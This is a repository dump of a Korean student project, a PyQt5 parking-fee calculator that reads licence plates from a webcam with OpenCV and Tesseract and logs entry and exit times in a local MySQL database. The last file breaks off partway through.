[ { "alpha_fraction": 0.5489749312400818, "alphanum_fraction": 0.7414578795433044, "avg_line_length": 34.08000183105469, "blob_id": "a05110bf3aad13e0c8de00c0eb012067b1e957fa", "content_id": "6faeb46876c0b24c42cac14fad240b2488751aa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1182, "license_type": "no_license", "max_line_length": 113, "num_lines": 25, "path": "/README.md", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "# Parking-Calculator\n\n![image1](https://user-images.githubusercontent.com/78195880/108955459-8c4bd100-76b1-11eb-805d-f4d12b2bf4e4.PNG)\n![image2](https://user-images.githubusercontent.com/78195880/108955467-91108500-76b1-11eb-8b8a-024282b3f413.PNG)\n\n\n### 사용 기술:\n* 인공지능(AI)\n* 파이썬(Python)\n* 테서렉트(tesseract)\n* 오픈CV(OpenCV)\n* 데이터베이스(MySQL)\n* 파이큐티(PyQt5)\n\n### 프로그램의 흐름\n 1. 카메라에 번호판을 대고 등록 버튼을 누른다.\n 2. 번호가 등록되어있으면 경고문이 나오고 없으면 데이터가 저장이되고 DB에도 insert 된다.\n 3. 카메라에 번호판을 대고정산 버튼을 누른다.\n 4. 번호가 없으면 경고문이 나오고 있으면 DB에 update 된다.\n 5. 등록된 차메뉴 버튼을 누르면 현재 입력되있는 번호판이 출력된다.\n### 참고 Site:\n![wfw1](https://user-images.githubusercontent.com/78195880/108957258-81df0680-76b4-11eb-9162-5132050bc629.png)\n![wfwffw1](https://user-images.githubusercontent.com/78195880/108957255-81467000-76b4-11eb-881d-6fbd3d91d3b1.png)\n\n##### https://github.com/kairess/license_plate_recognition (kairess님) \n" }, { "alpha_fraction": 0.49674785137176514, "alphanum_fraction": 0.5166011452674866, "avg_line_length": 34.49530029296875, "blob_id": "00b6504418203992295b9956d9e49d6be06d621f", "content_id": "2a63aa7c0e0da1b8e3735e2830743fa31aab7db0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29546, "license_type": "no_license", "max_line_length": 201, "num_lines": 745, "path": "/Parking_pee_Calculater.py", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt5.QtWidgets import * # 사용할 PyQt5 모듈 \nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt, QThread , QTime\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QColor, QBrush, QFont , QPalette\nfrom PyQt5 import QtGui, QtCore, QtWidgets\n\nimport numpy as np # 수학과학 연산 모듈\nimport cv2 # openCV 모듈\nimport dlib # 이미지 처리 모듈\nimport pytesseract # 문자인식 \nfrom time import sleep \nfrom datetime import datetime, timedelta\n\nimport pymysql\n\n\n\ncarList = [''] # 차 번호판을 저장할 리스트\ncarTime = [''] # 입차시각 저장할 리스트\n\ncarMenuList = [] # 등록된 차량 리스트\n\nclass VideoThread(QThread): # 웹캠 이미지 재생\n \n change_pixmap_signal = pyqtSignal(np.ndarray)\n bSaveFlag = False\n\n def __init__(self):\n super().__init__()\n self._run_flag = True \n\n def run(self):\n # capture from web cam\n cap = cv2.VideoCapture(0) \n\n frameRate = int(cap.get(cv2.CAP_PROP_FPS))\n\n while self._run_flag: # _run_flag 가 트루일동안 계속 반복\n ret, cv_img = cap.read() # 비디오웹탬 이미지(cv_img)를 읽어옴\n if ret:\n self.change_pixmap_signal.emit(cv_img) # 읽어온 cv_img를 change_pixmap_signal로 뿌려줌\n\n key = cv2.waitKey(frameRate)\n\n if self.bSaveFlag:\n cv2.imwrite(\"./frame.jpg\", cv_img) \n self.bSaveFlag = False\n\n # shut down capture system\n cap.release()\n\n def stop(self):\n \"\"\"Sets run flag to False and waits for thread to finish\"\"\"\n self._run_flag = False\n self.wait()\n\nclass MyWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"주차요금 계산기\")\n self.setGeometry(100, 100, 670, 500)\n \n layout = QHBoxLayout()\n layout1 = QVBoxLayout()\n btlayout = QHBoxLayout()\n\n layout2 = QVBoxLayout()\n\n \n carMenuTe =QTextEdit(\"버튼을 눌러주세요\")\n\n self.image_label = QLabel(self)\n self.image_label.resize(640, 480)\n \n\n self.btnStart = QPushButton(\"등록\")\n self.btnStart.clicked.connect(self.onStartButtonClicked)\n #self.btnStop = QPushButton(\"시간\")\n #self.btnStop.clicked.connect(self.onStopButtonClicked)\n self.btncough = QPushButton(\"정산\")\n self.btncough.clicked.connect(self.onEndButtonClicked)\n self.btnMenu = QPushButton(\"등록된 차 메뉴\")\n self.btnMenu.clicked.connect(lambda: self.onCarMenuButtonClicked(carMenuTe))\n \n\n self.lblCar = QLabel(\"차량 번호: \")\n self.lblTime = QLabel(\"입차 시각: \")\n self.lblTime2 = QLabel(\"출차 시각: \")\n self.lbParkingTime = QLabel(\"주차 기간: \")\n self.lbParkingPrice = QLabel(\"주차 요금: \")\n\n price_label = QLabel(\"주차요금 표\")\n price_label.setAlignment(Qt.AlignCenter)\n font = price_label.font()\n font.setPointSize(20)\n price_label.setFont(font)\n\n price2_label = QLabel(\" 10초당 : 200만원\")\n price2_label.setAlignment(Qt.AlignCenter)\n font = price2_label.font()\n font.setPointSize(30)\n price2_label.setFont(font)\n\n \n layout1.addWidget(self.image_label)\n btlayout.addWidget(self.btnStart)\n btlayout.addWidget(self.btncough)\n layout1.addLayout(btlayout)\n\n layout1.addWidget(self.lblCar)\n layout1.addWidget(self.lblTime)\n layout1.addWidget(self.lblTime2)\n layout1.addWidget(self.lbParkingTime)\n layout1.addWidget(self.lbParkingPrice)\n\n \n layout2.addWidget(price_label)\n layout2.addWidget(price2_label)\n layout2.addWidget(self.btncough)\n layout2.addWidget(self.btnMenu)\n layout2.addWidget(carMenuTe)\n \n layout2.addStretch(2)\n\n layout.addLayout(layout1)\n layout.addLayout(layout2)\n self.setLayout(layout) \n \n # create the video capture thread\n self.thread = VideoThread()\n self.thread.change_pixmap_signal.connect(self.update_image)\n # start the thread\n self.thread.start()\n\n def onCarMenuButtonClicked(self,carMenuTe): # 저장된 자동차 목록 \n carMenuTe.clear() #\n for car in carList:\n carMenuTe.append(car)\n \n\n def insert_db(self,carnumb): # 입차 데이터 DB에 저장\n conn = pymysql.connect(host=\"localhost\",user=\"root\",password=\"1234\",db=\"mydb1\",charset=\"utf8\")\n\n\n try:\n mydb = conn.cursor()\n sql = \"insert into carlist(car_number, intime) values(%s, now())\"\n mydb.execute(sql, carnumb)\n conn.commit()\n\n finally:\n conn.close() \n\n def update_db(self,_time,_price, carnumb): # 출차데이터 DB에 업데이트\n conn = pymysql.connect(host=\"localhost\",user=\"root\",password=\"1234\",db=\"mydb1\",charset=\"utf8\")\n try:\n mydb = conn.cursor()\n sql =\"update carlist set outtime=now(), parkingTime=%s, parkingPrice=%s where car_number=%s and outtime is null\"\n vals = (_time, _price, carnumb)\n mydb.execute(sql, vals )\n conn.commit()\n finally:\n conn.close()\n\n def onStartButtonClicked(self): # 입차한 차 번호판 인식 및 입차시간 저장\n #비디오를 이미지로 캡쳐한다.\n self.thread.bSaveFlag = True\n #WAit0.5\n sleep(0.5)\n #self.thread.save()\n startTime = datetime.now()\n str_stTime = str(startTime)\n self.lblTime.setText(\"입차 시각: \" + str_stTime)\n carTime.append(startTime) # 주차등록 시간 배열에 추가\n \n #image_ori=cv2.imread(\"./frame.jpg\", cv2.IMREAD_UNCHANGED)\n img_ori = cv2.imread('./frame.jpg',cv2.IMREAD_UNCHANGED)\n#img_ori = cv2.imread('C:/KoreaAI/Image/testimg3.jpg')\n height, width, channel = img_ori.shape \n# ## 원본 사진을 그레이 색상으로 바꾼다.\n gray = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\n\n # 노이즈를 줄이기위해 가우시안 블러를 사용\n # blurring이란 이미지의 고주파 부분을 조금 더 자연스럽게 바꾸어줄 수 있는 방법이다.\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0)\n\n # 이미지의 Threshold를 적용하여 검은색과 흰색으로 이진화 한다.\n img_thresh = cv2.adaptiveThreshold(\n img_blurred,\n maxValue=255.0,\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n thresholdType=cv2.THRESH_BINARY_INV,\n blockSize=19,\n C=9\n )\n # ## 컨투어(contour)란 동일한 색 또는 동일한 픽셀값(강도,intensity)을 가지고 있는 영역의 경계선 정보, 물체의 윤곽선, 외형을 파악하는데 사용된다\n #\n # 흑백 이미지에서 컨투어(윤곽선)을 찾는다.\n contours, _ = cv2.findContours(\n img_thresh, mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)\n \n # Bounding Rectangle은 컨투어 라인을 둘러싸는 사각형을 그리는 방법이다. \n\n # 빈 이미지를 검은색으로 만든다.\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n # 리스트를 만들고\n contours_dict = []\n # 컨투어의 사각형 범위를 찾아서 검은 비어있는 이미지에 사각형을 그린다.\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x+w, y+h),\n color=(255, 255, 255), thickness=2)\n\n # insert to dict\n contours_dict.append({\n 'contour': contour,\n 'x': x,\n 'y': y,\n 'w': w,\n 'h': h,\n 'cx': x + (w / 2),\n 'cy': y + (h / 2)\n })\n\n # 컨투어를 감싸는 사각형들만 나온다\n\n # 번호판 크기 상수 지정\n MIN_AREA = 80\n MIN_WIDTH, MIN_HEIGHT = 2, 8\n MIN_RATIO, MAX_RATIO = 0.25, 1.0\n\n # 가능한 컨투어들을 저장해 놓는곳\n possible_contours = []\n\n cnt = 0\n for d in contours_dict:\n area = d['w'] * d['h'] # 면적=가로*세로\n ratio = d['w'] / d['h'] # 배율=가로/세로\n # 번호판일 확률이 높은 컨투어들을 저장\n if area > MIN_AREA and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT and MIN_RATIO < ratio < MAX_RATIO:\n d['idx'] = cnt\n cnt += 1\n possible_contours.append(d)\n\n # 비어있는 이미지 파일을 만들고\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 가능한 컨투어 사각형만을 그린다.\n for d in possible_contours:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n MAX_DIAG_MULTIPLYER = 5 # 컨투어 사이의 길이가 5배 안에 있어야 한다.\n MAX_ANGLE_DIFF = 12.0 # 첫번째 컨투어와 두번째 컨투어 중심사이의 대각선 최대값\n MAX_AREA_DIFF = 0.5 #\n MAX_WIDTH_DIFF = 0.8\n MAX_HEIGHT_DIFF = 0.2\n MIN_N_MATCHED = 3 # 3개 이상이 되어야 번호판이다.\n\n # 찾는 함수\n def find_chars(contour_list):\n matched_result_idx = []\n\n # d1 컨투어와 d2 컨투어를 비교하여 체크\n for d1 in contour_list:\n matched_contours_idx = []\n for d2 in contour_list:\n if d1['idx'] == d2['idx']:\n continue\n\n dx = abs(d1['cx'] - d2['cx'])\n dy = abs(d1['cy'] - d2['cy'])\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\n\n # 컨투어 사이의 거리 구한다\n distance = np.linalg.norm(\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']]))\n if dx == 0:\n angle_diff = 90\n else:\n angle_diff = np.degrees(np.arctan(dy / dx))\n\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] *\n d2['h']) / (d1['w'] * d1['h'])\n width_diff = abs(d1['w'] - d2['w']) / d1['w']\n height_diff = abs(d1['h'] - d2['h']) / d1['h']\n\n if distance < diagonal_length1 * MAX_DIAG_MULTIPLYER and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\n matched_contours_idx.append(d2['idx'])\n\n # append this contour\n matched_contours_idx.append(d1['idx'])\n\n # 후보군의 갯수가 3보다 작다면 제외\n if len(matched_contours_idx) < MIN_N_MATCHED:\n continue\n\n # 최종 후보군에 추가한다.\n matched_result_idx.append(matched_contours_idx)\n\n unmatched_contour_idx = []\n for d4 in contour_list:\n if d4['idx'] not in matched_contours_idx:\n unmatched_contour_idx.append(d4['idx'])\n\n unmatched_contour = np.take(possible_contours, unmatched_contour_idx)\n\n # 재귀함수 recursive하게 또 돌린다.\n recursive_contour_list = find_chars(unmatched_contour)\n\n for idx in recursive_contour_list:\n matched_result_idx.append(idx)\n\n break\n\n return matched_result_idx\n\n\n result_idx = find_chars(possible_contours)\n\n matched_result = []\n for idx_list in result_idx:\n matched_result.append(np.take(possible_contours, idx_list))\n\n # visualize possible contours\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n for r in matched_result:\n for d in r:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n\n PLATE_WIDTH_PADDING = 1.3 # 1.3\n PLATE_HEIGHT_PADDING = 1.5 # 1.5\n MIN_PLATE_RATIO = 3\n MAX_PLATE_RATIO = 10\n\n plate_imgs = []\n plate_infos = []\n\n \n # 최종 result에 대해서 순서대로 정렬하고 center x , y 구하고\n for i, matched_chars in enumerate(matched_result): \n sorted_chars = sorted(matched_chars, key=lambda x: x['cx']) # 뒤죽박죽 순서를 정렬해주고\n\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2 # result의 처음인덱스 끝인덱스 중심 좌표 x\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2 # '' 중심 좌표 y \n\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1] # ' 평균길이\n ['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\n\n sum_height = 0\n for d in sorted_chars:\n sum_height += d['h']\n\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING) # 평균 높이\n\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # 기울어진 번호판의 센터 높이\n triangle_hypotenus = np.linalg.norm( # 기울어진 번호판의 대각선길이\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\n )\n\n # 각도를 구하고\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # 아크탄젠트(높이 / 대각선) 해주고 세타\n\n # cv2.getRotationMatrix2D((중심점 X좌표, 중심점 Y좌표), 각도, 스케일) 회전\n rotation_matrix = cv2.getRotationMatrix2D(\n center=(plate_cx, plate_cy), angle=angle, scale=1.0)\n\n # 이미지의 위치를 변경\n img_rotated = cv2.warpAffine(\n img_thresh, M=rotation_matrix, dsize=(width, height))\n\n # 번호판 부분만 crop 자른다.\n \n img_cropped = cv2.getRectSubPix(img_rotated, patchSize=(int(plate_width), int(plate_height)), center=(int(plate_cx), int(plate_cy)))\n \n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO > MAX_PLATE_RATIO:\n continue\n\n plate_imgs.append(img_cropped)\n plate_infos.append({\n 'x': int(plate_cx - plate_width / 2),\n 'y': int(plate_cy - plate_height / 2),\n 'w': int(plate_width),\n 'h': int(plate_height)\n })\n\n plate_chars = []\n longest_idx, longest_text = -1, 0\n \n img_result = img_cropped\n #cv2.imwrite('C:/KoreaAI/Image/t1-er_plate.jpg', img_result)\n\n chars = pytesseract.image_to_string(img_result, lang='kor', config='--psm 7')\n\n result_chars1 = ''\n has_digit = False\n for c in chars:\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit():\n if c.isdigit():\n has_digit = True\n result_chars1 += c\n\n print(result_chars1)\n isStored = False\n for num in carList:\n if num ==result_chars1:\n QMessageBox.information(self,\"경고\",\"이미 주차된 번호 입니다.\")\n isStored = True\n break # 차들 번호판 저장\n\n if isStored == False:\n carList.append(result_chars1)\n self.lblCar.setText(\"차량 번호: \" + result_chars1)\n self.insert_db(result_chars1)\n \n \n \n\n self.lblTime2.setText(\"출차 시각: \")\n self.lbParkingTime.setText(\"주차 기간: \")\n self.lbParkingPrice.setText(\"주차 요금: \")\n \n \n\n\n def onEndButtonClicked(self): # 출차한 차 번호판 인식 및 시간,요금 저장\n #비디오를 이미지로 캡쳐한다.\n self.thread.bSaveFlag = True\n #WAit0.5\n sleep(0.5)\n #self.thread.save()\n\n EndTime = datetime.now()\n str_stTime = str(EndTime)\n self.lblTime2.setText(\"출차 시각: \" + str_stTime)\n # 주차등록 시간 배열에 추가\n \n\n #image_ori=cv2.imread(\"./frame.jpg\", cv2.IMREAD_UNCHANGED)\n img_ori = cv2.imread('./frame.jpg',cv2.IMREAD_UNCHANGED)\n#img_ori = cv2.imread('C:/KoreaAI/Image/testimg3.jpg')\n\n height, width, channel = img_ori.shape \n\n# ## 원본 사진을 그레이 색상으로 바꾼다.\n gray = cv2.cvtColor(img_ori, cv2.COLOR_BGR2GRAY)\n\n # 노이즈를 줄이기위해 가우시안 블러를 사용\n # blurring이란 이미지의 고주파 부분을 조금 더 자연스럽게 바꾸어줄 수 있는 방법이다.\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0)\n\n # 이미지의 Threshold를 적용하여 검은색과 흰색으로 이진화 한다.\n img_thresh = cv2.adaptiveThreshold(\n img_blurred,\n maxValue=255.0,\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n thresholdType=cv2.THRESH_BINARY_INV,\n blockSize=19,\n C=9\n )\n\n # ## 컨투어(contour)란 동일한 색 또는 동일한 픽셀값(강도,intensity)을 가지고 있는 영역의 경계선 정보, 물체의 윤곽선, 외형을 파악하는데 사용된다\n #\n # 흑백 이미지에서 컨투어(윤곽선)을 찾는다.\n contours, _ = cv2.findContours(\n img_thresh, mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # 빈 이미지를 만들고\n #temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 빈 이미지에 전체 컨투어를 그린다.\n #cv2.drawContours(temp_result, contours=contours,\n # contourIdx=-1, color=(255, 255, 255))\n\n # Bounding Rectangle은 컨투어 라인을 둘러싸는 사각형을 그리는 방법이다. \n\n # 빈 이미지를 검은색으로 만든다.\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 리스트를 만들고\n contours_dict = []\n\n # 컨투어의 사각형 범위를 찾아서 검은 비어있는 이미지에 사각형을 그린다.\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x+w, y+h),\n color=(255, 255, 255), thickness=2)\n\n # insert to dict\n contours_dict.append({\n 'contour': contour,\n 'x': x,\n 'y': y,\n 'w': w,\n 'h': h,\n 'cx': x + (w / 2),\n 'cy': y + (h / 2)\n })\n\n # 컨투어를 감싸는 사각형들만 나온다\n\n # 번호판 크기 상수 지정\n MIN_AREA = 80\n MIN_WIDTH, MIN_HEIGHT = 2, 8\n MIN_RATIO, MAX_RATIO = 0.25, 1.0\n\n # 가능한 컨투어들을 저장해 놓는곳\n possible_contours = []\n\n cnt = 0\n for d in contours_dict:\n area = d['w'] * d['h'] # 면적=가로*세로\n ratio = d['w'] / d['h'] # 배율=가로/세로\n # 번호판일 확률이 높은 컨투어들을 저장\n if area > MIN_AREA and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT and MIN_RATIO < ratio < MAX_RATIO:\n d['idx'] = cnt\n cnt += 1\n possible_contours.append(d)\n\n # 비어있는 이미지 파일을 만들고\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n # 가능한 컨투어 사각형만을 그린다.\n for d in possible_contours:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n MAX_DIAG_MULTIPLYER = 5 # 컨투어 사이의 길이가 5배 안에 있어야 한다.\n MAX_ANGLE_DIFF = 12.0 # 첫번째 컨투어와 두번째 컨투어 중심사이의 대각선 최대값\n MAX_AREA_DIFF = 0.5 #\n MAX_WIDTH_DIFF = 0.8\n MAX_HEIGHT_DIFF = 0.2\n MIN_N_MATCHED = 3 # 3개 이상이 되어야 번호판이다.\n\n # 찾는 함수\n def find_chars(contour_list):\n matched_result_idx = []\n\n # d1 컨투어와 d2 컨투어를 비교하여 체크\n for d1 in contour_list:\n matched_contours_idx = []\n for d2 in contour_list:\n if d1['idx'] == d2['idx']:\n continue\n\n dx = abs(d1['cx'] - d2['cx'])\n dy = abs(d1['cy'] - d2['cy'])\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\n\n # 컨투어 사이의 거리 구한다\n distance = np.linalg.norm(\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']]))\n if dx == 0:\n angle_diff = 90\n else:\n angle_diff = np.degrees(np.arctan(dy / dx))\n\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] *\n d2['h']) / (d1['w'] * d1['h'])\n width_diff = abs(d1['w'] - d2['w']) / d1['w']\n height_diff = abs(d1['h'] - d2['h']) / d1['h']\n\n if distance < diagonal_length1 * MAX_DIAG_MULTIPLYER and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\n matched_contours_idx.append(d2['idx'])\n\n # append this contour\n matched_contours_idx.append(d1['idx'])\n\n # 후보군의 갯수가 3보다 작다면 제외\n if len(matched_contours_idx) < MIN_N_MATCHED:\n continue\n\n # 최종 후보군에 추가한다.\n matched_result_idx.append(matched_contours_idx)\n\n unmatched_contour_idx = []\n for d4 in contour_list:\n if d4['idx'] not in matched_contours_idx:\n unmatched_contour_idx.append(d4['idx'])\n\n unmatched_contour = np.take(possible_contours, unmatched_contour_idx)\n\n # 재귀함수 recursive하게 또 돌린다.\n recursive_contour_list = find_chars(unmatched_contour)\n\n for idx in recursive_contour_list:\n matched_result_idx.append(idx)\n\n break\n\n return matched_result_idx\n\n\n result_idx = find_chars(possible_contours)\n\n matched_result = []\n for idx_list in result_idx:\n matched_result.append(np.take(possible_contours, idx_list))\n\n # visualize possible contours\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\n\n for r in matched_result:\n for d in r:\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(\n d['x']+d['w'], d['y']+d['h']), color=(255, 255, 255), thickness=2)\n\n\n PLATE_WIDTH_PADDING = 1.3 # 1.3\n PLATE_HEIGHT_PADDING = 1.5 # 1.5\n MIN_PLATE_RATIO = 3\n MAX_PLATE_RATIO = 10\n\n plate_imgs = []\n plate_infos = []\n\n # 최종 result에 대해서 순서대로 정렬하고 center x , y 구하고\n for i, matched_chars in enumerate(matched_result): \n sorted_chars = sorted(matched_chars, key=lambda x: x['cx']) # 뒤죽박죽 순서를 정렬해주고\n\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2 # result의 처음인덱스 끝인덱스 중심 좌표 x\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2 # '' 중심 좌표 y \n\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1] # ' 평균길이\n ['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\n\n sum_height = 0\n for d in sorted_chars:\n sum_height += d['h']\n\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING) # 평균 높이\n\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # 기울어진 번호판의 센터 높이\n triangle_hypotenus = np.linalg.norm( # 기울어진 번호판의 대각선길이\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\n )\n\n # 각도를 구하고\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # 아크탄젠트(높이 / 대각선) 해주고 세타\n\n # cv2.getRotationMatrix2D((중심점 X좌표, 중심점 Y좌표), 각도, 스케일) 회전\n rotation_matrix = cv2.getRotationMatrix2D(\n center=(plate_cx, plate_cy), angle=angle, scale=1.0)\n\n # 이미지의 위치를 변경\n img_rotated = cv2.warpAffine(\n img_thresh, M=rotation_matrix, dsize=(width, height))\n\n # 번호판 부분만 crop 자른다.\n img_cropped = cv2.getRectSubPix(img_rotated, patchSize=(\n int(plate_width), int(plate_height)), center=(int(plate_cx), int(plate_cy)))\n\n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO > MAX_PLATE_RATIO:\n continue\n\n plate_imgs.append(img_cropped)\n plate_infos.append({\n 'x': int(plate_cx - plate_width / 2),\n 'y': int(plate_cy - plate_height / 2),\n 'w': int(plate_width),\n 'h': int(plate_height)\n })\n\n plate_chars = []\n longest_idx, longest_text = -1, 0\n\n img_result = img_cropped\n \n #cv2.imwrite('C:/KoreaAI/Image/t1-er_plate.jpg', img_result)\n \n chars = pytesseract.image_to_string(img_result, lang='kor', config='--psm 7')\n\n result_chars = ''\n has_digit = False\n for c in chars:\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit():\n if c.isdigit():\n has_digit = True\n result_chars += c\n \n print(result_chars)\n self.lblCar.setText(\"차량 번호: \" + result_chars)\n try:\n carindex = carList.index(result_chars)\n print(carindex)\n except ValueError:\n print(\"wwwww\")\n\n try:\n if (carList[carindex]==result_chars):\n extime = (EndTime-carTime[carindex]).seconds\n print(extime)\n str_exTime = str(extime)\n self.lbParkingTime.setText(\"주차 기간: \"+str_exTime+ \" 초\")\n price = (extime/10)*2000000\n #final_price = round(price)\n str_Price = str(price)\n self.lbParkingPrice.setText(\"주차 요금: \"+str_Price+ \" 원\")\n carList.remove(carList[carindex]) # 출차된 번호판 삭제\n carTime.remove(carTime[carindex]) # 출차된 차량 시간 삭제\n\n self.update_db(str_exTime,str_Price, result_chars) \n \n except UnboundLocalError:\n QMessageBox.information(self,\"경고\",\"없는 주차번호 입니다.\")\n print(\"번호가 없습니다.\")\n \n\n \n \n\n def closeEvent(self, event): # 창을 종료하면 쓰레드가 멈춰 stop()에 false 값을 보냄\n self.thread.stop()\n event.accept()\n @pyqtSlot(np.ndarray)\n def update_image(self, cv_img): # 이미지를 화면에 나타냄\n \"\"\"Updates the image_label with a new opencv image\"\"\"\n qt_img = self.convert_cv_qt(cv_img)\n self.image_label.setPixmap(qt_img)\n \n def convert_cv_qt(self, cv_img): # cv로 읽어온 이미지를 Qt이미지로 변환 \n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaled(640, 480, Qt.KeepAspectRatio)\n return QPixmap.fromImage(p)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5925397276878357, "alphanum_fraction": 0.6131267547607422, "avg_line_length": 26.863636016845703, "blob_id": "f85a7ba1fbdf6b7b9366e273d428b861d83ba435", "content_id": "244887de27edb04991355bf9597158cb4e150778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5114, "license_type": "no_license", "max_line_length": 83, "num_lines": 176, "path": "/sss.py", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "import cv2\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QPushButton\nfrom PyQt5.QtCore import Qt ,QRect\nfrom PyQt5.QtGui import QPainter, QPen, QColor, QBrush, QFont\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pytesseract\nimport datetime\n\n\nclass ShowVideo(QtCore.QObject):\n\n flag = 0\n\n camera = cv2.VideoCapture(0)\n \n ret, image = camera.read()\n \n\n height, width = image.shape[:2]\n \n VideoSignal1 = QtCore.pyqtSignal(QtGui.QImage)\n \n\n def __init__(self, parent=None):\n super(ShowVideo, self).__init__(parent)\n\n @QtCore.pyqtSlot()\n def startVideo(self):\n global image\n\n run_video = True\n while run_video:\n ret, image = self.camera.read()\n color_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n qt_image1 = QtGui.QImage(color_swapped_image.data,\n self.width,\n self.height,\n color_swapped_image.strides[0],\n QtGui.QImage.Format_RGB888)\n self.VideoSignal1.emit(qt_image1)\n\n\n if self.flag:\n img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n\n \n\n \n\n\n loop = QtCore.QEventLoop()\n QtCore.QTimer.singleShot(25, loop.quit) #25 ms\n loop.exec_()\n\n \n\nclass ImageViewer(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(ImageViewer, self).__init__(parent)\n self.image = QtGui.QImage()\n 